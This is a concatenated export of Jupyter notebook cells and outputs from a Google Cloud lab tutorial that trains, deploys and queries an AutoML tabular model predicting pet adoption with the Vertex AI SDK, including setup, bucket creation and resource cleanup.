Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
from datetime import datetime
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# This will take around an hour to run
model = job.run(
dataset=ds,
target_column="Adopted",
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification_toy.csv"
! gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/petfinder-tabular-classification_toy.csv [Content-Type=text/csv]...
[1 files][378.2 KiB/378.2 KiB]
Operation completed over 1 objects/378.2 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two hour and half to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
